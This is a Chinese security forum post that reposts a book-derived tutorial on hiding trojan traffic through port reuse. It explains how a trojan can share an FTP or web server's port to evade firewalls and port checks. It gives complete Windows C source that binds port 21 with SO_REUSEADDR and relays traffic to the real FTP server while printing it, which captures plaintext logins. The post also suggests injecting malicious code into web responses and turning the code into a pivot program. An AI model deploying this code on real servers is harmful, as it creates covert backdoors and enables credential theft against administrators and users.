安全矩阵

 找回密码
 立即注册
搜索
查看: 2019|回复: 0

网络安全编程:端口复用

[复制链接]

221

主题

233

帖子

792

积分

高级会员

Rank: 4

积分
792
发表于 2021-6-5 09:42:44 | 显示全部楼层 |阅读模式
网络安全编程:端口复用计算机与网络安全 前天
一次性付费进群,长期免费索取资料。
回复公众号:微信群 可查看进群流程。
广告
Windows黑客编程技术详解作者:甘迪文
当当


微信公众号:计算机与网络安全
ID:Computer-network

木马的服务端与客户端通信必将产生活动端口,产生活动端口就很容易被发现,那么应该如何隐藏端口呢?

1. 端口复用的原理

端口复用就是某个已经被其他服务绑定过的端口再次被绑定而进行重复使用。端口复用对于木马程序来说有两个好处。第一个好处是隐藏端口,比如某台主机上搭建了FTP服务器,这样默认情况下就开启了21号端口,通过端口复用就可以直接使用21号端口完成木马的通信,在进行检测时就不会发现有多余的端口被打开;第二个好处是不会被防火墙阻拦,因为端口复用FTP服务端口或Web服务端口这些已知和合法的端口,这些端口在服务器上是正常使用的端口,那么管理员当然会允许这些正常服务的通信连接。

木马使用端口复用技术后,由于木马和被复用服务使用同一个端口(比如木马复用了FTP的21号端口),当数据包到达时,系统根据指定IP地址较详细的原则就传递给谁。指定IP地址时的代码如下:
  1. sockaddr_in saddr;
  2. saddr.sin_addr.S_un.S_addr = INADDR_ANY;
复制代码
在代码中对地址的赋值使用了INADDR_ANY,表示任意的本机IP地址都可以。这样指定的地址不是最明确的。通常提供服务的Web服务器或FTP服务器都有类似的设置。那么在编写使用端口复用技术的木马时,就要明确指定用户所使用的一个IP地址。无论用户是拥有内网的IP地址,还是有外网的IP地址,都拥有一个回环地址,即127.0.0.1。在设置重复绑定的端口时,可以设置为除127.0.0.1之外的任意具体IP地址。比如,可以设定一个“10.10.30.77”IP地址。而127.0.0.1这个回环地址是木马与提供服务的服务器软件进行通信的。示意图如图1所示。

图1  端口服务用木马通信示意图

从图1中可以看出,无论是防火墙外部还是防火墙内容,木马都是可以正常通信的。复用了FTP服务器端口的木马会收到所有发给FTP服务器的数据,那么木马在中间充当一个数据中转的作用,把原本发给FTP服务器的数据还是转发给FTP服务器。如何区分是发给FTP服务器的数据,还是发给木马的数据?凡是发给木马的数据都是有固定的数据头部的,以此可以判断哪些数据转发、哪些数据自己进行处理。由于木马所处的通信位置,很容易截取到发送给FTP服务器的数据,也很容易篡改FTP服务器发送给客户端的数据。这点是很可怕、很危险的。同样,如果复用的是Web服务器的端口,那么就可以在不修改Web页面的情况下,直接发送给浏览器一些恶意代码,从而对用户进行攻击。
2. 端口复用的代码实现

下面来看源代码的实现。
  1. #include <stdio.h>
  2. #include <winsock2.h>
  3. #pragma comment (lib, "ws2_32")
  4. DWORD WINAPI ClientThread(LPVOID lpParam);
  5. int main()
  6. {
  7.   WSADATA wsa;
  8.   SOCKET s;
  9.   BOOL bVal;
  10.   SOCKET sc;
  11.   int nAddrSize;
  12.   sockaddr_in ClientAddr;
  13.   // 初始化 SOCK 库
  14.   WSAStartup(MAKEWORD(2, 2), &wsa);
  15.   // 建立套接字
  16.   s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  17.   bVal = TRUE;
  18.   // 设置套接字为复用模式
  19.   if ( setsockopt(s, SOL_SOCKET, SO_REUSEADDR, (char *)&bVal, sizeof(bVal)) != 0 )
  20.   {
  21.     printf("error! \r\n");
  22.     return -1;
  23.   }
  24.   sockaddr_in sListen;
  25.   sListen.sin_family = AF_INET;
  26.   // 这里的 IP 地址必须明确指定一个地址
  27.   sListen.sin_addr.S_un.S_addr = inet_addr("192.168.1.102");
  28.   sListen.sin_port = htons(21);
  29.   // 绑定 21 号端口
  30.   if ( bind(s, (SOCKADDR*)&sListen, sizeof(SOCKADDR)) == SOCKET_ERROR )
  31.   {
  32.     printf("%d\r\n", GetLastError());
  33.     printf("error bind! \r\n");
  34.     return -1;
  35.   }
  36.   // 监听套接字
  37.   listen(s, 1);
  38.   // 循环接受来自 FTP 客户端或木马的请求
  39.   while ( TRUE )
  40.   {
  41.     HANDLE hThread;
  42.     nAddrSize = sizeof(SOCKADDR);
  43.     // 接受请求
  44.     sc = accept(s, (SOCKADDR*)&ClientAddr, &nAddrSize);
  45.     if ( sc != INVALID_SOCKET )
  46.     {
  47.       // 创建新线程进行处理
  48.       hThread = CreateThread(NULL, 0, ClientThread, (LPVOID)sc, 0, NULL);
  49.       CloseHandle(hThread);
  50.     }
  51.   }
  52.   closesocket(s);
  53.   WSACleanup();
  54.   return 0;
  55. }
  56. DWORD WINAPI ClientThread(LPVOID lpParam)
  57. {
  58.   // 保存与 FTP 客户端通信的 SOCKET
  59.   SOCKET sc = (SOCKET)lpParam;
  60.   // 建立与 FTP 服务器端通信的 SOCKET
  61.   SOCKET sFtp;
  62.   sockaddr_in saddr;
  63.   DWORD dwTimeOut;
  64.   DWORD dwNum;
  65.   BYTE bBuffer[0x1000] = { 0 };
  66.   sFtp = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  67.   saddr.sin_family = AF_INET;
  68.   saddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
  69.   saddr.sin_port = htons(21);
  70.   // 设置超时
  71.   dwTimeOut = 100;
  72.   setsockopt(sc, SOL_SOCKET, SO_RCVTIMEO,
  73.     (char *)&dwTimeOut, sizeof(dwTimeOut));
  74.   setsockopt(sFtp, SOL_SOCKET, SO_RCVTIMEO,
  75.     (char *)&dwTimeOut, sizeof(dwTimeOut));
  76.   // 连接 FTP 服务器
  77.   connect(sFtp, (SOCKADDR*)&saddr, sizeof(SOCKADDR));
  78.   // 循环接受客户端与服务器的通信数据
  79.   while ( TRUE )
  80.   {
  81.     // 接收客户端的数据
  82.     dwNum = recv(sc, (char *)bBuffer, 0x1000, 0);
  83.     if ( dwNum > 0 && dwNum != SOCKET_ERROR )
  84.     {
  85.       bBuffer[dwNum] = '\0';
  86.       printf("%s \r\n", bBuffer);
  87.       // 转发给 FTP 服务器端
  88.       send(sFtp, (char *)bBuffer, dwNum, 0);
  89.     }
  90.     else if ( dwNum == 0 )
  91.     {
  92.       break;
  93.     }
  94.     ZeroMemory(bBuffer, 0x1000);
  95.     // 接收 FTP 服务器端的数据
  96.     dwNum = recv(sFtp, (char *)bBuffer, 0x1000, 0);
  97.     if ( dwNum > 0 && dwNum != SOCKET_ERROR )
  98.     {
  99.       bBuffer[dwNum] = '\0';
  100.       printf("%s \r\n", bBuffer);
  101.       // 转发给客户端
  102.       send(sc, (char *)bBuffer, dwNum, 0);
  103.     }
  104.     else if ( dwNum == 0 )
  105.     {
  106.       break;
  107.     }
  108.     ZeroMemory(bBuffer, 0x1000);
  109.   }
  110.   closesocket(sc);
  111.   closesocket(sFtp);
  112.   return 0;
  113. }
复制代码
这里的代码中只是实现了一个端口复用的转发功能,并没有提供木马的相应功能。如果加入木马的功能,就要在木马收到数据后先判断是控制端发送的木马命令,还是应该转发的数据,从而进行相应的处理。木马在转发数据的过程中获取了FTP数据,如图2所示。

图2  木马转发数据

编译连接自己的代码,然后先启动FTP服务器,再启动连接好的木马,通过命令行下连接FTP服务器。在木马转发的过程中得到了登录FTP服务器的账号和密码(FTP对于账号和密码的传输都是明文进行的)。以此来看,木马在转发数据包的过程中也成了针对某服务的嗅探工具。

如法炮制,通过简单修改上面的代码则可以改成一个跳板程序。具体实现方式与此类似,就不再进行阐述。作为延展性的内容,请大家自行完成。

参考文献:C++ 黑客编程揭秘与防范(第3版)

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 06:30 , Processed in 0.014076 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表